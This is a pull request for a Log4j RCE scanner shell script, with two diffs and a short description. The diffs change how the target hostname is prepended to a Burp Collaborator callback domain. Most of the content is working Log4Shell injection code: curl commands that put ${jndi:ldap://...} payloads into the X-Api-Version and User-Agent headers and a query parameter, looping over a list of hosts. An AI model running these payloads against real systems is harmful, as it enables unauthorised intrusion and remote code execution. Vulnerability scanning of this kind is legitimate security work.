### PR TITLE
Feature/prepend target url to collaborator url

### DIFF
--- a/log4j-rce-scanner.sh
+++ b/log4j-rce-scanner.sh
@@ -41,9 +41,11 @@ domainScan() {
 
 listScan() {
     cat $list | sort -u | httpx -silent | while read url; do 
-    echo 'curl -s --max-time 20 $url -H 'log4jPayload' > /dev/null' | sed "s|log4jPayload|'X-Api-Version: \${jndi:ldap://$url.$burpcollabid/a}'|g" | sed "s|\$url|$url|g" | bash
-    echo 'curl -s --max-time 20 '$url/?test=log4jPayload' > /dev/null' | sed "s|log4jPayload|'\$\\\{{jndi:ldap://$url.$burpcollabid/a\\\}}'|g" | sed "s|\$url|$url|g" | bash
-    echo 'curl -s --max-time 20 $url -H 'log4jPayload' > /dev/null' | sed "s|log4jPayload|'User-Agent: \${jndi:ldap://$url.$burpcollabid/a}'|g" | sed "s|\$url|$url|g" | bash
+    url_without_protocol=$(echo $url | sed 's|https://||g' | sed 's|http://||g')
+    url_without_protocol_and_port=$(echo $url_without_protocol | sed 's|:.*||g')
+    echo 'curl -s --max-time 20 $url -H 'log4jPayload' > /dev/null' | sed "s|log4jPayload|'X-Api-Version: \${jndi:ldap://$url_without_protocol_and_port.$burpcollabid/a}'|g" | sed "s|\$url|$url|g" | bash
+    echo 'curl -s --max-time 20 '$url/?test=log4jPayload' > /dev/null' | sed "s|log4jPayload|'\$\\\{{jndi:ldap://$url_without_protocol_and_port.$burpcollabid/a\\\}}'|g" | sed "s|\$url|$url|g" | bash
+    echo 'curl -s --max-time 20 $url -H 'log4jPayload' > /dev/null' | sed "s|log4jPayload|'User-Agent: \${jndi:ldap://$url_without_protocol_and_port.$burpcollabid/a}'|g" | sed "s|\$url|$url|g" | bash
     echo -e "\033[104m[ DOMAIN ==> $url ]\033[0m" "\n" "\033[92m Method 1 ==> X-Api-Version: running-Ldap-payload" "\n" " Method 2 ==> Useragent: running-Ldap-payload" "\n" " Method 3 ==> $url/?test=running-Ldap-payload" "\n\033[0m";done
 }
 

--- a/log4j-rce-scanner.sh
+++ b/log4j-rce-scanner.sh
@@ -41,9 +41,9 @@ domainScan() {
 
 listScan() {
     cat $list | sort -u | httpx -silent | while read url; do 
-    echo 'curl -s --max-time 20 $url -H 'log4jPayload' > /dev/null' | sed "s|log4jPayload|'X-Api-Version: \${jndi:ldap://$burpcollabid/a}'|g" | sed "s|\$url|$url|g" | bash
-    echo 'curl -s --max-time 20 '$url/?test=log4jPayload' > /dev/null' | sed "s|log4jPayload|'\$\\\{{jndi:ldap://$burpcollabid/a\\\}}'|g" | sed "s|\$url|$url|g" | bash
-    echo 'curl -s --max-time 20 $url -H 'log4jPayload' > /dev/null' | sed "s|log4jPayload|'User-Agent: \${jndi:ldap://$burpcollabid/a}'|g" | sed "s|\$url|$url|g" | bash
+    echo 'curl -s --max-time 20 $url -H 'log4jPayload' > /dev/null' | sed "s|log4jPayload|'X-Api-Version: \${jndi:ldap://$url.$burpcollabid/a}'|g" | sed "s|\$url|$url|g" | bash
+    echo 'curl -s --max-time 20 '$url/?test=log4jPayload' > /dev/null' | sed "s|log4jPayload|'\$\\\{{jndi:ldap://$url.$burpcollabid/a\\\}}'|g" | sed "s|\$url|$url|g" | bash
+    echo 'curl -s --max-time 20 $url -H 'log4jPayload' > /dev/null' | sed "s|log4jPayload|'User-Agent: \${jndi:ldap://$url.$burpcollabid/a}'|g" | sed "s|\$url|$url|g" | bash
     echo -e "\033[104m[ DOMAIN ==> $url ]\033[0m" "\n" "\033[92m Method 1 ==> X-Api-Version: running-Ldap-payload" "\n" " Method 2 ==> Useragent: running-Ldap-payload" "\n" " Method 3 ==> $url/?test=running-Ldap-payload" "\n\033[0m";done
 }
 


### PR DESCRIPTION
Rework of https://github.com/adilsoybali/Log4j-RCE-Scanner/pull/2

Created 2 separate variables inside the loop

- the url without the protocol
- the url without protocol and port

The latter one is safe to be prepended to the callback host :)